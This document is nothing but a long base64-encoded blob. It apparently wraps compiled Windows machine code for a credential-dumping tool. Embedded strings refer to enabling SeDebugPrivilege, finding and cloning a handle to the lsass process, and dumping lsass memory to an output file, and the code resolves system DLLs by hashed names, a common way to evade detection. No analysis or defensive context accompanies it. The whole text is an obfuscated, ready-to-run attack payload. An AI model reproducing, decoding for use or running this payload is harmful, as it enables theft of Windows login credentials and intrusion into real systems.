KUGdCQUFCSWk1NlFBQUFBLzVhSUFBQUFNZEpKaWZoSWljSC8wMGlMdkNUQUFRQUFTSXVla0FBQUFQK1dpQUFBQURIU1NZbjRTSW5CLzlOSWk3d2tzQUVBQUVpTG5wQUFBQUQvbG9nQUFBQXgwa2lKd1VtSitQL1R1QUVBQUFEcGZQNy8vMHlKOGVrMy9QLy9USXUrZ0FBQUFNZUVKQVFDQUFBZ0FBQUEvNWFJQUFBQVFiZ0FBZ0FBTWRKSWljRkIvOWRKaWNkSWlZUWsrQUVBQUUyRi93K0Y3dnYvLzBqSGhDUUFBZ0FBQUFBQUFFeUx0Q1FvQWdBQTZRNzcvLytMUkNSZ3gwUWtaQVFBQUFESGhDU0VBQUFBQUFBQUFJUEFCSW1FSk9BQkFBRHBZUHIvLzBGV1RZbk9RVlZKaWMxQlZGVlhTSW5YVmxORWljTklnK3d3VEl1a0pKQUFBQUJKaTdRa2dBQUFBRUgvbENTSUFBQUFNZEpKaWRoSWljSC8xa2lGd0ErRWd3QUFBRWlKM1VpSnhvWGJkQzB4d0E4ZmdBQUFBQUFQdGhRSGlCUUdTSVBBQVVnNXczWHdTSW53U0FIelpwQ0FNRUZJZzhBQlNEbkRkZlJCaWVoSWlmSk1pZWxOaWZGSXgwUWtJQUFBQUFC
Qi8xUWtlRW1MbkNTUUFBQUFRZitVSklnQUFBQklnOFF3U1lud01kSklpY0ZJaWRoYlhsOWRRVnhCWFVGZS8rQVBINEFBQUFBQVNJUEVNRnRlWDExQlhFRmRRVjdEa0pDUWtKQ1FrSkNRUVZjeHdFRldRVlZCVkZWWFZraUp6cmtlQUFBQVUwaUI3RmdIQUFCSWpid2tRQUVBQUV5SmhDU3dCd0FBODBpcnVSNEFBQUJJeDBRa1lBQUFBQUJJeDBRa2FBQUFBQURIaENTd0FBQUFNQUFBQUVqSGhDUzRBQUFBQUFBQUFNZUVKTWdBQUFBQUFBQUFTTWVFSk1BQUFBQUFBQUFBeHdjQUFBQUFTSTI4SkZBQ0FBRHpTS3RJdUZBQWNnQnZBR01BU01lRUpOQUFBQUFBQUFBQVNJbUVKSUFBQUFCSXVHVUFjd0J6QUFBQVNJbUVKSWdBQUFDNGN3QUFBRWpIaENUWUFBQUFBQUFBQUVqSFJDUndBQUFBQUVqSFJDUjRBQUFBQUVqSGhDUXdBUUFBQUFBQUFFakhoQ1E0QVFBQUFBQUFBRWpIaENSQUFnQUFBQUFBQUVqSGhDUklBZ0FBQUFBQUFNY0hBQUFBQU1kRUpGcHNjMkZ6Wm9sRUpGNkxEb1hKRDRTVkF3QUFpZFZOaWN3eDIwVXgvMFV4OXVzT0R4OEFnOE1CT1I0UGhqMERBQUNKMzRYdGRBcElqUVIvT1d6R0NIWGxTSTBFZjR0RXhoZzlBQUFRQUErVndUMkpBUklBRDVYQ2hORjB5U1gvLy9mL1BaOEJFZ0IwdlUyRjluUVFRYmdBZ0FBQU1kSk1pZkZCLzFRa09FaU5CSDlJalV3a2FMcEFCQUFBU01kRUpIZ0FBQUFBVEkwc3hreU5UQ1J3UVl0RkNFeU5oQ1N3QUFBQVNJbEVKSERvUE9mLy8wRVB0MVVPeDBRa01BQUFBQUJNalV3a1lNZEVKQ2dBQUFBQVNJdE1KR2hKeDhELy8vLy94MFFrSUJBRUFBRG9QZVQvLzBHNUJBQUFBRUc0QUJBQUFESEp1Z0FRQUFCQi8xUWtTRW1KeGtpRndBK0VHLy8vLzBpTFRDUmdRYmtBRUFBQVNZbkF1Z0lBQUFCSXgwUWtJQUFBQUFEbzl1ci8vNFhBRDRqeS92Ly9TWXRPQ0VpTmxDU0FBQUFBUWY5VUpGQ0Z3QStGMmY3Ly8waU52Q1F3QVFBQU1kSklpMHdrWUVHNUJBRUFBRW1KK0VIL1ZDUmdoY0FQaExUKy8vOUlqWVFrUUFJQUFFaUxUQ1JvUWJnRUFRQUFTSWxFSkVoSWljSkIvMVFrYUlYQUQ0U00vdi8vU0kxVUpGcElpZmxCLzFRa1dFaUZ3QStFZHY3Ly8wSDNSUmdRQkFBQUQ0Um8vdi8vU0l0TUpFaElqYndrWUFNQUFFeU52Q1JRQlFBQVFmOVVKSEM1UGdBQUFFeUxSQ1J3U0xwa0lHRnVaQ0J6ZFVtSndVaTRXeXRkSUVadmRXNUlpWlFrNkFBQUFFaTZiSGtnWTJ4dmJtVklpWVFrNEFBQUFFaTRZMk5sYzNObWRXeElpWVFrOEFBQUFFaTRaQ0JvWVc1a2JHVklpWVFrQUFFQUFFaTRJR3h6WVhOeklHbElpWVFrRUFFQUFFaTRDVnNyWFNCSVlXNUlpWVFra0FBQUFFaTRkSE02SUNWNENnQklpWVFrb0FBQUFESEE4MGlyU0ltVUpQZ0FBQUJJamJ3a1lBVUFBRWk2SUNnbFpDa2dkRys1UGdBQUFFaUpsQ1FJQVFBQVNMcHVPaUFsY3lBb0pmTklxMGlKbENRWUFRQUFTSTI4SkZBREFBQkl1bVJzWlNCU2FXZG9TSW1VSkpnQUFBQklpZmxJalpRazRBQUFBRXlKUkNRZ3g0UWtJQUVBQUdRcENnQkl4NFFrVUFNQUFBQUFBQUJJeDRRa1dBTUFBQUFBQUFCSXg0UWtVQVVBQUFB
QUFBQkl4NFFrV0FVQUFBQUFBQUJCLzFRa0dFV0xSUmhNaWZsSWpaUWtrQUFBQUVIL1ZDUVlTSXVNSkxBSEFBQklpZnBCLzFRa0NFeUora2lMakNTd0J3QUFRZjlVSkFoTWkzd2tZSVh0ZFZsTWlmbUR3d0ZCLzFRa0tEa2VENGZKL1AvL1pnOGZSQUFBU0l0TUpHaEloY2wwQlVIL1ZDUW9UWVgyZEJCQnVBQ0FBQUF4MGt5SjhVSC9WQ1E0U0lIRVdBY0FBRXlKK0Z0ZVgxMUJYRUZkUVY1Qlg4TkZNZi9yNUVpTFRDUm9TSVhKZGNEcnlKQ1FrSkJCVjBtSjEwRldUWW5HUVZWQmljMU1pY2xCVkZOTWljdElnZXl3QUFBQTZPd0xBQUJJaGNBUGhGTUJBQUJFaWVwSmlkbE5pZmhJaWNGSmljVG83L3IvLzBtSnhVaUZ3QStFa3dJQUFFaTRXeXBkSUU1dmR5Qk1pZm5HUkNSaUFFaTZkSEo1YVc1bklIUklpVVFrUUVpNGJ5QmtkVzF3SUd4SWlWUWtTRWk2YzJGemN5QXVMaTVJaVVRa1VMZ2dDZ0FBU0lsVUpGaElqVlFrUUdhSlJDUmcvMU1JVElueFJUSEpSVEhBU01kRUpEQUFBQUFBdWdBQUFFREhSQ1FvZ0FBQUFNZEVKQ0FDQUFBQS8xTWdTWW5HU0lQNC93K0VGZ0VBQUV5SjZmOVRNRW1KMlUySjhFeUo2WW5DNkxEci8vK0Z3QStFZUFFQUFFaTRXeXRkSUV4ellYTk1pZmxJdW5NZ1pIVnRjQ0JweDRRa2lBQUFBSFJsQ2dCSWlVUWtjRUcvQVFBQUFFaTRjeUJqYjIxd2JHVklpVlFrZUVpTlZDUndTSW1FSklBQUFBRC9Vd2hOaGZaMEJreUo4ZjlUS0V5SjZmOVRLRUc0QUlBQUFESFNUSW5oLzFNNFNJSEVzQUFBQUVTSitGdEJYRUZkUVY1Qlg4Tm1EeCtFQUFBQUFBQkl1RnN0WFNCR1lXbHNUSW41U0xwbFpDQjBieUJuWmNlRUpKQUFBQUJzWlhNS1NJbEVKSEJGTWY5SXVIUWdZU0JzYVhOMFNJbFVKSGhJdWlCdlppQm9ZVzVrU0ltVUpJZ0FBQUJJalZRa2NFaUpoQ1NBQUFBQXhvUWtsQUFBQUFEL1V3anBlLy8vL3c4ZmhBQUFBQUFBU0xoYkxWMGdRMjkxYkV5SitVaTZaQ0J1YjNRZ2QzTEhoQ1NZQUFBQWFXeGxDa2lKUkNSd1JUSC9TTGhwZEdVZ2RHOGdjMGlKVkNSNFNMcHdaV05wWm1sbFpFaUpoQ1NBQUFBQVNMZ2diM1YwY0hWMFpraUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBTWFFSkp3QUFBQUEvMU1JNmQvKy8vOW1EeDlFQUFCSXVGc3RYU0JUYjIxbFRJbjVSVEgvU0xwMGFHbHVaeUIzWlVpSlJDUndTTGh1ZENCM2NtOXVaMGlKVkNSNFNMb2dkMmhwYkdVZ1pFaUpoQ1NBQUFBQVNMaDFiWEJwYm1jS0FFaUpsQ1NJQUFBQVNJMVVKSEJJaVlRa2tBQUFBUDlUQ09sdC92Ly9aZzhmaEFBQUFBQUFTTGhiTFYwZ1EyOTFiRXlKK1VpNlpDQnViM1FnWm1uSGhDU2dBQUFBYVdRS0FFaUpSQ1J3UlRIL1NMaHVaQ0JoY0hCeWIwaUpWQ1I0U0xwd2NtbGhkR1VnYUVpSmhDU0FBQUFBU0xoaGJtUnNaU0JwYmtpSmxDU0lBQUFBU0xvZ1oybDJaVzRnY0VpSmxDU1lBQUFBU0kxVUpIQklpWVFra0FBQUFQOVRDT254L2YvL2tKQ1FrSkNRa0pDUWtKQ1FRVmU0cUJVQUFFRldRVlZCVkZWWFZsUG9hdHovLzBHNEFCQUFBRWdweEVtSnpESEF1UUFDQUFCSWpid2tvQVVBQUVpTm5DU2dBUUFBU0lu
VlNNZEVKSEFBQUFBQTgwaXJ1VUFBQUFCSWlkOU1qYlFrb0FNQUFQTklxMHlKOTdsQUFBQUFTSTIwSktBRkFBRHpTS3RNalV3a1pFaUo4a21MVENRUVNNZEVKSGdBQUFBQVNNZUVKSUFBQUFBQUFBQUF4MFFrWkFBQUFBRC9sUkFCQUFDTFJDUmtTSTJNSkpBQUFBQklpVXdrT01Ib0E0bEVKR1FQaElJQkFBQk1qWHdrY0RIL1RJbjRUWW4zU1luR0R4OUFBRW1MVENRUVNJc1dRYmtZQUFBQVRZbncvNVVZQVFBQWhjQVBoRDRCQUFCSmkwd2tFRWlMRmtHNUFBRUFBRW1KMlArVklBRUFBSVhBRDRRZkFRQUFTTGd1QUhNQWJ3QUFBRWlKMmNlRUpKZ0FBQUErQUFBQVNJbEVKR2hJdUR3QVpRQnNBR1lBU0ltRUpKQUFBQUQvbGNnQUFBQkltRXlOREVOSmpWSCtTRG5hY3gvcHZnSUFBR1lQSDRRQUFBQUFBSVA0TDNRVVNJMUMva2c1MkhJUFNJbkNEN2NDZy9oY2RlZElnOElDU1NuUnVmOEFBQUJCdVA4QUFBQk5pYzFNaVV3a0tFblIvVW1CK2Y4QkFBQk1EMGZwVEluNVM0MUVMUUJJaVVRa1FFd0IrRWlKUkNRdy8xVUFTSXRFSkRCTWkwd2tLREhKWm9rSVNZUDVDQStIaGdBQUFFbUQrUVlQaDVVQUFBQk1pZnJyQ3c4ZmdBQUFBQUJJZzhJQ0Q3Y0NSSTFBdjQxSUlHWkJnL2dhRDBMQlpva0Nab1hBZGVKTWkyd2tjSXRFSkhoSmkwd2tFRXlMUkNRNFRJbnFpVVFrS09nTERRQUFoY0FQaFpNQUFBQ0R4d0ZJZzhZSU9Yd2taQStIa3Y3Ly8waUJ4S2dWQUFCYlhsOWRRVnhCWFVGZVFWL0RaZzhmUkFBQVNZbm9USW5xVEluNTZOb0pBQUJJbUVpRndBK0ZQd0VBQUVpTFJDUkFTSTFVSkdoSmpVd0grditWS0FFQUFJWEFENFZPLy8vL1NZMVYvVW1KNkV5SitlaWpDUUFBU0poSWhjQVBoRFQvLy85SktjVklpMVFrT0V1TlRHLzYvNVVBQVFBQTZSei8vLytMaENUb0FBQUFUWXRFSkRDSlJDUXdpNFFrbUFBQUFJbEVKRUJOaGNBUGhPUUFBQUJCaTBRa09FR0xWQ1E4T2RCeVZVeUxuWmdBQUFBQjBreUpSQ1JZUVlsVUpEeUpWQ1JVVElsY0pFai9sWWdBQUFDTFZDUlVUSXRFSkZoTWkxd2tTRWlKd1V4cHlpZ0NBQUF4MGtILzAwbUp3RW1KUkNRd1RZWEFENFRGQUFBQVFZdEVKRGhJYWNBb0FnQUFTWXRNSkJCTWllcEJ1UVFCQUFCTmpVUUFIUCtWQ0FFQUFFR0xSQ1E0aTB3a0tFaUp3a2hwd0NnQ0FBQkpBMFFrTUlsSUVJdE1KRUNEd2dGTWlXZ0lpVWdVaTB3a01NY0FBQUFBQUlsSUdFR0pWQ1E0NlliKy8vOW1EeCtFQUFBQUFBQkpLY1V4MG1aQ2laUnNvQU1BQU9rWi92Ly9EeDlFQUFCQngwUWtQQ0FBQUFCTWk0MkFBQUFBVElsTUpFai9sWWdBQUFCQnVBQkZBQUJNaTB3a1NESFNTSW5CUWYvUlNZbkFTWWxFSkRCTmhjQVBoVHYvLy85SngwUWtPQUFBQUFEcEdQNy8vMEc0L3dBQUFFeUp5a3lKK2Y5VkFESEFab21FSktBREFBRHBxZjMvLzVDUWtKQ1FrSkNRa0pDUWtKQkJWYnA4WWZST1FWUkppY3k1WTlkUDVsZElnZXhRQWdBQTZJSUNBQUJJaGNBUGhIc0JBQUJKaWNDNExnQUFBRWlOZkNSQXVSNEFBQUJtaVVRa0xqSEFRUSsyRkNUelNLdTVIZ0FBQUVqSFJDUXdBQUFBQUVqSFJDUTRBQUFBQUVq
SGhDUkFBUUFBQUFBQUFFakhoQ1JJQVFBQUFBQUFBTWNIQUFBQUFFaU52Q1JRQVFBQTgwaXJ4d2NBQUFBQWhOSjBHbVlQSDBRQUFBKzJ5RWlEd0FHSVZBd3dRUSsyRkFTRTBuWHNUSTFrSkRCSWpWUWtMa3lKNFVILzBFbUp3RWlGd0ErRTJnQUFBQSsyVUFIR0FBQ0UwZytFQ1FFQUFESEFEeCtBQUFBQUFBKzJ5RWlEd0FHSWxBeEFBUUFBUVErMlZBQUJoTkoxNkErMmhDUkFBUUFBaE1BUGhOZ0FBQUJNallRa1FRRUFBTGtGRlFBQUR4OEFpY3BKZzhBQndlSUZBZEFCd1VFUHRrRC9oTUIxNm9IeFJFTkNRVUdKelErMlJDUXdoTUFQaEtjQUFBQk1qVVFrTWJrRkZRQUFacENKeWttRHdBSEI0Z1VCMEFIQlFRKzJRUCtFd0hYcWdmRkVRMEpCNkk4QUFBQklpY0ZJaGNCMEYwU0o2dWl2Q0FBQVNJSEVVQUlBQUY5QlhFRmR3MmFRdVRHdEFqSG9aZ0FBQUVpSndVaUZ3SFVXTWNCSWdjUlFBZ0FBWDBGY1FWM0REeCtBQUFBQUFMcS9zLzBlNkc0SUFBQkloY0IwMjB5SjRmL1FTSW5CU0lYQWRhVXh3T3ZNRHgrRUFBQUFBQUJCdlVGV1FrSHBUUC8vLzdsQlZrSkI2WGYvLy8rUWtKQ1FrSkNRa0pDUWtHVklpd1FsWUFBQUFFaUxRQmlCOFVSRFFrRkJpY3BNaTFnZ1RZblpEeDhBU1l0SlVFaUZ5WFJqRDdjQlpvWEFkRjlJaWNvUEgwQUFSSTFBdjJaQmcvZ1pkd2FEd0NCbWlRSVB0MElDU0lQQ0FtYUZ3SFhpRDdjQlpvWEFkREpCdUFVVkFBQVBIMEFBUkluQ1NJUEJBc0hpQlFIUVFRSEFEN2NCWm9YQWRlbEZPY0owRjAyTENVMDV5M1dVTWNERGtFRzRCUlVBQUVVNXduWHBTWXRCSU1OQlZFR0oxRk9KeTBpRDdGam9ULy8vLzBpRndIVWl1VEd0QWpIb1FQLy8vMGlKd1VpRndIVW9TSVBFV0RIQVcwRmN3MllQSDBRQUFFaUR4RmhFaWVKSWljRmJRVnpwUmdjQUFHWVBIMFFBQUxxL3MvMGU2RFlIQUFCSWhjQjB5WUg3bCt4Ym1BK0VoUUFBQUlIN0RjbGlKZytFNlFBQUFJSDdZOWRQNWcrRXRRQUFBSUg3aUNiNEFBK0VBUUVBQUlIN3V3N085WFdSU0xwQmNHa3RiWE10ZDhaRUpFSUFTTGxwYmkxamIzSmxMVWlKVkNRZ1NMcDJaWEp6YVc5dUxVaUpUQ1FvU0xsc01TMHhMVEF1WkVpSlZDUXd1bXhzQUFCSWlVd2tPRWlOVENRZ1pvbFVKRUQvMEVpSndlc3NacEJCdUd4c0FBQklqVXdrSU1aRUpDb0FTTHRWYzJWeU16SXVaRWlKWENRZ1prU0pSQ1FvLzlCSWljRkloY2tQaEFYLy8vOUlnOFJZUkluaVcwRmM2VjRHQUFCbUR4OUVBQUJJdTFOb2JIZGhjR2t1U0kxTUpDREhSQ1FvWkd4c0FFaUpYQ1FnLzlCSWljSHJ2dzhmUkFBQVNMdEJaSFpoY0drek1raU5UQ1FneGtRa0xBQklpVndrSU1kRUpDZ3VaR3hzLzlCSWljSHJrZzhmaEFBQUFBQUFTTHRRYzJGd2FTNWtiTGxzQUFBQVpvbE1KQ2hJalV3a0lFaUpYQ1FnLzlCSWljSHBZdi8vLzVDUWtKQ1FrSkNRUVZSRk1jQkZNZVJXVTBpSnkwaUQ3RERIUkNRc0FBQUFBRWlOZENRc1NZbnhUSW5pdVJBQUFBRG9qTjMvLzRYQWVRbzlCQUFBd0hRWFJUSGtTSVBFTUV5SjRGdGVRVnpERHgrRUFBQUFBQUJOaGVSMERrRzRBSUFBQURIU1RJbmgvMU00UWJn
QUVBQUFpMVFrTEVHNUJBQUFBREhKLzFOSVJJdEVKQ3hKaWNUcm5KQ1FrSkNRa0pDUWtKQ1FrSkNRUVZkQlZrV0p4a0ZWVFluTlFWUlZNZTFYU0lub1Zvbk91U2NBQUFCVFNJblRTSUhzeUFVQUFFaU52Q1NBQUFBQVRJMjhKSUFBQUFEelNLdE1pZm5vN1FZQUFFR0p4SVhBZFI1SWdjVElCUUFBUkluZ1cxNWZYVUZjUVYxQlhrRmZ3dzhmZ0FBQUFBQk1pZm5vQUEwQUFFR0p4SVhBRDRRZEFnQUFoZllQaE1VQUFBQkl1RnNxWFNCRGFHVmpUSW5wU0xwcmFXNW5JR1p2Y3NhRUpBQUVBQUFBU0ltRUpNQURBQUJCdkFFQUFBQkl1Q0J3Y205alpYTnpTSW1VSk1nREFBQkl1bVZ6SUhkcGRHZ2dTSW1FSk5BREFBQkl1R0VnYzNWcGRHRmlTSW1VSk5nREFBQkl1bXhsSUdoaGJtUnNTSW1FSk9BREFBQkl1R1VnZEc4Z2JITmhTSW1VSk9nREFBQkl1bk56SUM0dUxpQUtTSW1VSlBnREFBQklqWlFrd0FNQUFFaUpoQ1R3QXdBQS81UWtpQUFBQUV5SitreUo2ZWhDQlFBQTZRZi8vLzhQSDBRQUFFaU52Q1RRQVFBQXVUNEFBQUJGaWZER1JDUnlBRWk0V3lwZElFRjBkR1ZJdW0xd2RHbHVaeUIwU01lRUpNQURBQUFBQUFBQVRJMmtKTUFEQUFCSWlVUWtRRWlOdENUQUFRQUFTTGh2SUdOc2IyNWxJRWlKUkNSUVNMaHVaR3hsSUdaeWIwaUpSQ1JndUdRS0FBQm1pVVFrY0VpNFd5cGRJRTkxZEdaSWlVUWtJRWlKNlBOSXEwaUpWQ1JJdVQ0QUFBQkl1bXh6WVhOeklHaGhTSTI4Sk5BREFBQklpVlFrV0VpNmJTQndhV1E2SUNWSXg0UWt5QU1BQUFBQUFBRHpTS3RJaWZGSWlWUWthRWk2YVd4bE9pQWxjd3BJaVZRa0tFaU5WQ1JBeGtRa01BQkl4NFFrd0FFQUFBQUFBQUJJeDRRa3lBRUFBQUFBQUFEL2xDU1lBQUFBU1luWVRJbmhTSTFVSkNEL2xDU1lBQUFBU0lueVRJbnAvNVFraUFBQUFFeUo0a3lKNlVHOEFRQUFBUCtVSklnQUFBQk5pZmxKaWRoTWllcEVpZkhvMVBELy8rbTUvZi8vRHgrQUFBQUFBRWk2WkNCdWIzUWdaVzVNaWVsSXVGc3RYU0JEYjNWc3g0UWs0QU1BQUd4bFoyVklpWlFreUFNQUFFaTZkV2NnY0hKcGRtbElpWVFrd0FNQUFFaTRZV0pzWlNCRVpXSklpWlFrMkFNQUFMb0tBQUFBWm9tVUpPUURBQUJJalpRa3dBTUFBRWlKaENUUUF3QUEvNVFraUFBQUFPazcvZi8va0VGVlJUSEpSVEhTU0xndUFHRUFZd0J0QUVGVVZWZElpYzh4eVZaSWlkWXgwbE5NaWNORk1jQklnZXlvQUFBQVNJbEVKQ1F4d0V5TlpDUWtTSTFzSkdCbWlVUWtMRWk0TGdCa0FHd0FiQUJJaVVRa0xraTRMZ0JrQUhJQWRnQklpVVFrT0VpNExnQmxBSGdBWlFCSWlVUWtRa2k0TGdCdkFHTUFlQUJJaVVRa1RFaTRMZ0IyQUhnQVpBQklpVVFrVmtpTlJDUXVTSWxFSkdoSWpVUWtPRWlKUkNSd1NJMUVKRUpJaVVRa2VFaU5SQ1JNU0ltRUpJQUFBQUJJalVRa1ZtYUpWQ1EyWm9sTUpFQm1SSWxFSkVwbVJJbE1KRlJtUklsVUpGNU1pV1FrWUVpSmhDU0lBQUFBU01lRUpKQUFBQUFBQUFBQVRJbmgvNVBJQUFBQVFZbkZTSmhJT2ZCelBVaUo4a2dwd2tpTkRGZE1pZUwva3lnQkFBQ0Z3SFVaU0lIRXFBQUFBRVNKNkZ0
ZVgxMUJYRUZkdzJZUEgwUUFBRXlMWlFoSWc4VUlUWVhrZGJCRk1lM3IxWkNRa0pDUWtFRldRVlZCVkVtSjFGVkVpY1ZYUkluUFZraUp6bE5JZyt3Z1NJdFpXRWlMaENTQUFBQUFTSVhiZEcyTFVXQkVpMGxrUkRuS2NqWkhqU3dKVEl1d21BQUFBRVNKYVdUL2tJZ0FBQUJGaWVsSmlkZ3gwa2lKd1VuQjRRUkIvOVpJaWNOSWlVWllTSVhiZEZ1TFZtQkJpZENEd2dGSndlQUVUQUhEVElramlXc0lpWHNNaVZaZ1NJUEVJRnRlWDExQlhFRmRRVjdERHg4QVNJdVlnQUFBQU1kQlpDQUFBQUQva0lnQUFBQkJ1QUFDQUFBeDBraUp3Zi9UU0luRFNJbEdXRWlGMjNXbFNNZEdZQUFBQUFCSWc4UWdXMTVmWFVGY1FWMUJYc09Ra0pDUVZWZFdVMGhqYVR4SUFjMkx2WWdBQUFCSUFjOUVpMDhnaTNjWVNRSEpoZlowVm9uVFNZbkxSVEhTZ2ZORVEwSkJRWXNCdVFVVkFBQk1BZGhNalVBQkQ3WUFoTUIwSVdZdUR4K0VBQUFBQUFDSnlzSGlCUUhRQWNGTWljQkpnOEFCRDdZQWhNQjE2VG5aZEJSSmc4SUJTWVBCQkV3NTFuVzRNY0JiWGw5ZHc0dFhKRXVOREZPTFJ4d1B0eFFSU1kwVWs0c0VBa3dCMkVnNXgzZmVpNVdNQUFBQVNBSFhTRG40ZDlCYlNJbkJYbDlkNlJyMS8vK1FrSkNRa0pDUWtKQ1FRVlJCdVVBQUFBQkppY3hYVmt5SnhsTklpZE5JZyt4NFNNZEVKQ0FBQUFBQVRJMUVKRERvWmRqLy8waGpWQ1JzU1lud1RJbmhTTWRFSkNBQUFBQUFRYmtJQVFBQWljZElBZHJvUWRqLy8yYUJmQ1F3VFZwMUJBbkhkQlF4d0VpRHhIaGJYbDlCWE1NUEg0UUFBQUFBQURIQWdUNVFSUUFBRDVUQTYrR1FrSkJCVlVtSnpVaUowVUZVVTBpSjAwaUQ3RkRvMmZqLy8waUZ3SFEwU1luRVNZblpUWW5vTWRKSWljSG80ZWYvLzB5SjRVRzRBSUFBQURIUy8xTTRTSVBFVUxnQkFBQUFXMEZjUVYzRER4OUFBRWk0V3kxZElFWmhhV3pIUkNSQWJHVnpDa3lKNlVpNlpXUWdkRzhnWjJWSWlVUWtJRWk0ZENCaElHeHBjM1JJaVZRa0tFaTZJRzltSUdoaGJtUklpVlFrT0VpTlZDUWdTSWxFSkRER1JDUkVBUDlUQ0VpRHhGQXh3RnRCWEVGZHcxTzZ6OC9ZRkVpSnk3a3hyUUl4U0lQc0lPaHA5di8vdWlmby9aTzVNYTBDTVVpSkEraFg5di8vdWs3b2hwTzVNYTBDTVVpSlF3am9SUGIvLzdxSCs5cTV1WmZzVzVoSWlVTVE2REgyLy8rNnZvYlVxcmt4clFJeFNJbERHT2dlOXYvL3VrT0pNbm01TWEwQ01VaUpReURvQy9iLy83cTFoTVFJdVRHdEFqRklpVU1vNlBqMS8vKzZhb3pOSjdreHJRSXhTSWxETU9qbDlmLy91dE5NYm5tNU1hMENNVWlKUXpqbzB2WC8vN3B4ZmU5T3VXUFhUK1pJaVVOSTZMLzEvLys2ZkdIMFRybGoxMC9tU0lsRFVPaXM5Zi8vdWc0S0pLVzVNYTBDTVVpSlExam9tZlgvLzdvdHh4RmZ1VEd0QWpGSWlVTmc2SWIxLy8rNk1SL1pucmxqMTAvbVNJbERhT2h6OWYvL3V2U3ZmaWU1TWEwQ01VaUpRM0RvWVBYLy83cEtKTDlldVRHdEFqRklpVU40NkUzMS8vKzZSazRhaDdreHJRSXhTSW1EZ0FBQUFPZzM5Zi8vdW9IUUNuYTVNYTBDTVVpSmc0Z0FBQURvSWZYLy83cGhnbk5mdVRHdEFqRklpWU9RQUFB
QTZBdjEvLys2dGlpdEVya3hyUUl4U0ltRG1BQUFBT2oxOVAvL3VyK3ovUjY1TWEwQ01VaUpnNkFBQUFEbzMvVC8vN3F5ckVyQ3VUR3RBakZJaVlPb0FBQUE2TW4wLy8rNmVJMnNjYmt4clFJeFNJbURzQUFBQU9pejlQLy91a29jQ0lPNU1hMENNVWlKZzdnQUFBRG9uZlQvLzdwazZJYVR1VEd0QWpGSWlZUEFBQUFBNklmMC8vKzZXL2h6anJreHJRSXhTSW1EeUFBQUFPaHg5UC8vdXR1bzBaYTVNYTBDTVVpSmc5QUFBQURvVy9ULy83cUxlamhNdVRHdEFqRklpWVBZQUFBQTZFWDAvLys2elFWQlVMbTdEczcxU0ltRDRBQUFBT2d2OVAvL3VpcTZOcFM1dXc3TzlVaUpnK2dBQUFEb0dmVC8vN29ZMnljNXVic096dlZJaVlQd0FBQUE2QVAwLy8rNnFhajlrN2t4clFJeFNJbUQrQUFBQU9qdDgvLy91aVFLSktXNU1hMENNVWlKZ3dBQkFBRG8xL1AvLzdyVzNKemt1VEd0QWpGSWlZTUlBUUFBNk1Iei8vKzZ0VVQxdDdreHJRSXhTSW1ERUFFQUFPaXI4Ly8vdXRxY3pidTVNYTBDTVVpSmd4Z0JBQURvbGZQLy83cXZudjJUdVRHdEFqRklpWU1nQVFBQTZIL3ovLys2UlozOWs3a3hyUUl4U0lsRFFPaHM4Ly8vdXNBdDdQcTVEY2xpSmtpSmd5Z0JBQURvVnZQLy8waUR1eEFCQUFBQVNJbURNQUVBQUErRUVRSUFBRWlEdXhnQkFBQUFENFFyQWdBQVNJTzdJQUVBQUFBUGhFVUNBQUJJZzN0Z0FBK0VZZ0lBQUVpRGUyZ0FENFIvQWdBQVNJTzdDQUVBQUFBUGhKa0NBQUJJZzNzSUFBK0V2Z0VBQUVpRGV4QUFENFN6QVFBQVNJTjdHQUFQaEtnQkFBQklnM3NnQUErRW5RRUFBRWlEZXlnQUQ0U1NBUUFBU0lON01BQVBoSWNCQUFCSWczczRBQStFZkFFQUFFaURlMGdBRDRSeEFRQUFTSU43VUFBUGhHWUJBQUJJZzN0WUFBK0VXd0VBQUVpRGUyQUFENFJRQVFBQVNJTjdhQUFQaEVVQkFBQklnM3R3QUErRU9nRUFBRWlEZTNnQUQ0UXZBUUFBU0lPN2dBQUFBQUFQaENFQkFBQklnN3VJQUFBQUFBK0VFd0VBQUVpRHU1QUFBQUFBRDRRRkFRQUFTSU83bUFBQUFBQVBoUGNBQUFCSWc3dWdBQUFBQUErRTZRQUFBRWlEdTZnQUFBQUFENFRiQUFBQVNJTzdzQUFBQUFBUGhNMEFBQUJJZzd1NEFBQUFBQStFdndBQUFFaUR1OEFBQUFBQUQ0U3hBQUFBU0lPN3lBQUFBQUFQaEtNQUFBQklnN3ZRQUFBQUFBK0VsUUFBQUVpRHU5Z0FBQUFBRDRTSEFBQUFTSU83NEFBQUFBQjBmVWlEdStnQUFBQUFkSE5JZzd2d0FBQUFBSFJwU0lPNytBQUFBQUIwWDBpRHV3QUJBQUFBZEZWSWc3c0lBUUFBQUhSTFNJTzdFQUVBQUFCMFFVaUR1eGdCQUFBQWREZElnN3NnQVFBQUFIUXRTSU43UUFCMEpraUR1eWdCQUFBQWRCeElnN3N3QVFBQUFIUVNNY0JJZ3pzQUQ1WEE2d2tQSDRBQUFBQUFNY0JJZzhRZ1c4TzYxdHljNUxtSUp2Z0E2Q0h4Ly85SWc3c1lBUUFBQUVpSmd4QUJBQUFQaGRuOS8vOFBIMEFBdXJWRTliZTVpQ2I0QU9qNThQLy9TSU83SUFFQUFBQklpWU1ZQVFBQUQ0Vy8vZi8vRHg5QUFMcmFuTTI3dVlnbStBRG8wZkQvLzBpRGUyQUFTSW1ESUFFQUFBK0ZwZjMvL3c4ZmdBQUFBQUM2RGdva3BibUlKdmdBNktu
dy8vOUlnM3RvQUVpSlEyQVBoWXY5Ly85bUxnOGZoQUFBQUFBQXVpM0hFVis1aUNiNEFPaUI4UC8vU0lPN0NBRUFBQUJJaVVOb0Q0VnUvZi8vRHgrQUFBQUFBTG9rQ2lTbHVZZ20rQURvV2ZELy8waUpnd2dCQUFEcFRQMy8vNUNRa0pDUWtKQ1FrSkNRa0pCQlZMb29BQUFBUlRIa1ZsTklpY3RJeDhILy8vLy9TSVBzY0VqSFJDUTRBQUFBQUV5TlJDUTRTTWRFSkVBQUFBQUFTTWRFSkVnQUFBQUE2RW5MLy8rRndIVldNY25IUkNSQUFRQUFBRWk2Y21sMmFXeGxaMlZJdUZObFJHVmlkV2RRU0lsVUpGaElqWFFrUUVpTlZDUlF4MFFrVEFJQUFBQk1qVVFrUkVpSlJDUlF4a1FrWUFEL2t6QUJBQUNGd0hVWFNJdE1KRGovVXloSWc4UndSSW5nVzE1QlhNTVBId0JJaTB3a09FRzVFQUFBQUVtSjhESFNTTWRFSkNnQUFBQUFTTWRFSkNBQUFBQUE2Q0hGLy85SWkwd2tPSVhBZFJqL1V5aEJ